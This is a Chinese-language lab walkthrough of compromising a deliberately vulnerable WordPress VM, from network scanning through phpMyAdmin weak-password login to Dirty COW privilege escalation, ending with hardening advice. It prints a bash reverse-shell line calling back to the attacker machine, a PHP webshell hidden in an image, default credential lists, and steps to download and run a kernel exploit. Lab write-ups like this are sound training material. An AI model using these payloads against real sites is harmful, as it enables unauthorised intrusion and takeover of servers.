WordPress靶机渗透实战：从信息收集到脏牛提权的完整复现（附避坑指南）

WordPress靶机渗透实战：从信息收集到提权的完整复现与深度解析

在网络安全领域，WordPress作为全球使用最广泛的内容管理系统，其安全性一直备受关注。本文将带您深入复现一个典型WordPress靶机的完整渗透过程，从最初的信息收集到最终的权限提升，每个环节都配有实战截图和避坑指南。不同于普通的教程，我们特别关注那些容易被忽略的细节问题——比如虚拟机兼容性调整、扫描线程优化、漏洞利用中的环境适配等实际挑战。

1. 实验环境搭建与常见问题排查

1.1 靶机环境配置技巧

在开始渗透测试前，正确的环境配置是成功的基础。我们使用VMware Workstation Pro搭建实验环境，其中Kali Linux（10.10.16.133）作为攻击机，WordPress靶机（10.10.16.135）采用NAT网络模式。这个环节最常遇到三个典型问题：

1. 虚拟机版本不兼容：当导入靶机出现版本报错时，用文本编辑器打开.vmx文件，修改以下关键参数：

   virtualHW.version = "12" guestOS = "centos6-64" → 改为 "linux"

2. 网络连接异常：如果靶机无法联网，检查以下配置：

   • VMware虚拟网络编辑器中的NAT设置
   • 靶机内/etc/sysconfig/network-scripts/ifcfg-eth0文件
   • 使用service network restart重启网络服务

3. 系统时间不同步：这会影响某些漏洞利用效果，在Kali中执行：

   timedatectl set-timezone Asia/Shanghai ntpdate cn.pool.ntp.org

1.2 工具准备清单

工欲善其事，必先利其器。以下是渗透测试中会用到的核心工具及其替代方案：

注意：实际环境中建议同时准备2-3种工具，某些工具在特定环境下可能失效。

2. 信息收集阶段实战详解

2.1 主机发现的三重验证法

在内网环境中，我们采用三种方式交叉验证目标主机：

1. ARP扫描（最快速）：

   arp-scan -l --interface=eth0

   输出示例：

   10.10.16.135 00:0c:29:12:34:56 VMware, Inc.

2. ICMP探测（最隐蔽）：

   fping -asg 10.10.16.0/24 2>/dev/null

3. 主动探测（最全面）：

   netdiscover -r 10.10.16.0/24 -i eth0

三种方法结果相互印证，可避免单一工具的误报。当结果不一致时，优先相信ARP扫描结果。

2.2 深度端口扫描策略

使用nmap进行全端口扫描时，推荐组合参数：

nmap -sS -sV -T4 -p- -A -v -oA scan_result 10.10.16.135

关键参数解析：

• -sS：SYN扫描（半开扫描，不易被发现）
• -sV：服务版本探测
• -T4：速度等级（1-6，4为平衡选择）
• -p-：扫描所有65535个端口

扫描结果示例：

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache 2.4.6 (CentOS) 3306/tcp open mysql MySQL 5.5.60

避坑指南：当扫描结果异常时（如大量端口误报），尝试：

1. 降低扫描速度（-T2/T3）
2. 更换扫描类型（-sT完全连接扫描）
3. 使用--max-retries减少重试次数

2.3 Web指纹识别进阶技巧

Wappalyzer插件可以快速识别Web技术栈，但专业渗透测试人员还需要：

1. 手动验证CMS版本：

   • 检查/wp-includes/version.php
   • 查看readme.html
   • 分析登录页面源代码

2. HTTP头信息分析：

   curl -I http://10.10.16.135

   重点关注：

   • Server: Apache/2.4.6 (CentOS)
   • X-Powered-By: PHP/5.3.3

3. 文件特征检测：

   wget http://10.10.16.135/wp-content/themes/twentyseventeen/style.css grep "Theme Name" style.css

3. 漏洞挖掘与利用实战

3.1 目录爆破的黄金法则

使用DirBuster进行目录扫描时，关键配置如下：

1. 线程设置：

   • 物理机：建议20-30线程
   • 虚拟机：建议10-15线程
   • 云环境：根据带宽动态调整

2. 字典选择优先级：

   • 首选：SecLists中的raft-large-words.txt
   • 备选：DirBuster自带的directory-list-2.3-medium.txt
   • 自定义：针对WordPress的wp-content/uploads/年月目录结构

3. 结果过滤技巧：

   grep -v "403 Forbidden" results.txt | grep -v "404 Not Found"

真实案例：在一次测试中，通过扫描发现以下关键路径：

/wp-admin/install.php (200) /wp-content/backup/ (301) /phpmyadmin/ (302)

3.2 数据库弱口令突破实战

当发现phpMyAdmin入口时，按以下流程操作：

1. 弱口令尝试清单：

   root:root admin:admin root:[空密码] wordpress:wordpress

2. BurpSuite爆破流程：

   • 拦截登录请求发送到Intruder
   • 设置攻击类型为"Cluster bomb"
   • 加载用户名和密码字典
   • 过滤响应长度异常的条目

3. 成功登录后的关键操作：

   -- 查看WordPress用户表 SELECT * FROM wp_users; -- 修改管理员密码（MD5加密） UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID=1;

重要提示：真实环境中修改数据库前务必先备份，错误的SQL操作可能导致网站崩溃。

3.3 后台getshell的三种路径

获取后台权限后，可通过以下方式植入webshell：

方法一：主题编辑器注入

1. 进入外观→主题编辑器
2. 选择404.php模板
3. 插入PHP反向shell代码：

   <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.133/4444 0>&1'"); ?>

方法二：插件上传绕过

1. 制作包含恶意代码的插件zip包
2. 在插件上传页面选择文件
3. 使用Burp修改Content-Type为"application/zip"

方法三：媒体库图片马

1. 准备包含PHP代码的图片：

   echo '<?php system($_GET["cmd"]); ?>' >> shell.jpg

2. 上传后访问/wp-content/uploads/2023/11/shell.jpg?cmd=id

避坑指南：如果反弹shell失败，检查：

• 防火墙规则（iptables -L）
• 监听端口的网络连通性（telnet 10.10.16.133 4444）
• PHP安全模式是否禁用（phpinfo查看disable_functions）

4. 权限提升与系统加固

4.1 本地信息收集关键命令

获取初始shell后，首先执行以下信息收集：

1. 系统内核信息：

   uname -a cat /etc/*-release

2. 用户权限检查：

   id sudo -l find / -perm -4000 2>/dev/null

3. 网络配置检查：

   ifconfig netstat -tulnp arp -a

4.2 脏牛漏洞提权全流程

当系统内核版本显示为2.6.32时，可尝试脏牛(CVE-2016-5195)提权：

1. 漏洞验证：

   searchsploit dirty cow

2. EXP下载与编译：

   wget https://www.exploit-db.com/download/40839 -O dirty.c gcc -pthread dirty.c -o dirty -lcrypt chmod +x dirty

3. 执行提权：

   ./dirty mynewpassword

   成功后会出现firefart用户凭证

4. 切换用户：

   su firefart

技术原理：脏牛漏洞利用Linux内核内存子系统处理写时拷贝(COW)时的竞态条件，允许低权限用户修改只读内存映射，从而覆盖敏感文件如/etc/passwd。

4.3 防御措施建议

针对本次渗透涉及的漏洞，管理员应采取以下加固措施：

1. WordPress加固：

   • 限制wp-admin的访问IP
   • 禁用主题/插件编辑功能
   • 定期更新核心和插件

2. 系统层加固：

   # 更新内核 yum update kernel # 禁用危险函数 echo "disable_functions = exec,passthru,shell_exec,system" >> /etc/php.ini # 配置防火墙 iptables -A INPUT -p tcp --dport 3306 -j DROP

3. MySQL安全配置：

   • 删除匿名账户
   • 修改root默认密码
   • 限制phpMyAdmin访问源IP

在完成整个渗透流程后，最深刻的体会是：安全是一个持续的过程，不能依赖单一防护措施。建议企业建立漏洞扫描、补丁管理、权限控制、日志审计等多层防御体系，同时定期进行渗透测试验证防护效果。